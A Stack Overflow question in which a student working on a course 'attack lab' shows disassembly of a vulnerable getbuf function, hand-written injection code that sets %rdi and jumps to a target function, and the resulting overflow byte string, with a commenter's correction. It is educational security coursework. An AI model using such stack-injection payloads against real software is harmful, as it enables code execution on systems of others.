current community

your communities

more stack exchange communities

company blog
Stack Exchange Inbox Reputation and Badges
tour help
Join the Stack Overflow Community
Stack Overflow is a community of 6.4 million programmers, just like you, helping each other.
Join them; it only takes a minute:
Sign up
up vote 0 down vote favorite

I have a buffer overflow lab for homework in cs (also known as attack lab). In this phase, I have to overflow a char array, insert my own code in order to alter a register, and redirect to a "hidden function".

This is the main code executed every time: 

000000000040187a <getbuf>:  
40187a: 48 83 ec 38             sub    $0x38,%rsp  
40187e: 48 89 e7                mov    %rsp,%rdi  
401881: e8 8a 02 00 00          callq  401b10 <Gets>  
401886: b8 01 00 00 00          mov    $0x1,%eax  
40188b: 48 83 c4 38             add    $0x38,%rsp  
40188f: c3                      retq

Where simply gets the user input and stores it on the stack. I've been able to pass an address to a separate function (that was the first part) but using 56 characters to fill the array, and then overwriting the retq with an address to a function.

However, the second part gets trickier. Not only do I need to end up at the address of a function, but I also need to change a register (in this case, %rdi).

My most successful (but still unseccesful) attempt has been to write the assembly code as follows: 

pushq 0x2486651c
popq %rdi
pushq $0x004018bc
popq %rsp
retq

Where 0x2486651c is the value I want to be stored in %rdi, and 0x004018bc is the address that I want to then go to (and execute). I used gcc to turn this into a .o file, then objdump-ed it, and used the resulting byte commands as the beginning of my 56 char input. My input then becomes: 

68 1c 65 86 24 5f 68 bc 18 40 00 5c c3 ... 38 12 63 55

Where 38 12 63 55 is the little-indian style address of the beginning of the character array, and the pre-... is the byte instructions for the aforementioned assembly code.

Now, when running this, it will step into my assembly code above (using gdb and disas to view it). However, it results in a seg fault when trying to execute the retq.

So my task boils down to:
1. Pass some 56 char + an address input into the function
2. Have the end (+ address) lead to my own code
3. Have my own code change the value in %rdi
4. Then have my own code lead to a specified address of some other function that is already written.

Thank you in advance, and let me know if any of this is confusing and I'll do my best to elaborate.

share|improve this question
    
You don't need the popq %rsp, what do you think that does? You want the retq to pop off the address you pushed. – Jester Oct 19 at 12:24
    
That's the art I was confused on. Through some googling I though that retq would go to whatever %rsp held. Thank you. – Eric Oct 19 at 16:35

Your Answer

 
discard

By posting your answer, you agree to the privacy policy and terms of service.

Browse other questions tagged or ask your own question.